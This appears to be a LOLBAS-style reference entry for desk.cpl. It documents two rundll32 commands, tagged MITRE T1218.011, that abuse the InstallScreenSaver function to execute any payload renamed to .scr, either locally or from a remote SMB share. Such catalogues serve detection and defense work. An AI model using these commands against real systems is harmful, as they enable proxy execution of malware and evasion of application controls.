Desk.cpl

type: OSLibraries
Desktop Settings Control Panel

Full path

C:\Windows\System32\desk.cpl
C:\Windows\SysWOW64\desk.cpl

Commands

  1. ExecuteUser T1218.011

    Launch any executable payload, as long as it uses the .scr extension.

    rundll32.exe desk.cpl,InstallScreenSaver {PATH_ABSOLUTE:.scr}

    Launch an executable with a .scr extension by calling the InstallScreenSaver function.

    os: Windows 10, Windows 11

    Execute: EXE

  2. ExecuteUser T1218.011

    Launch any executable payload, as long as it uses the .scr extension.

    rundll32.exe desk.cpl,InstallScreenSaver {PATH_SMB:.scr}

    Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.

    os: Windows 10, Windows 11

    Execute: EXEExecute: Remote

Detection

Resources

acknowledgement: Rafael S Marques @pegabizu, Pierre-Alexandre Braeken @pabraeken, hai @VakninHai, Christopher Peacock @SecurePeacock, Jose Luis Sanchez @Joseliyo_Jstnk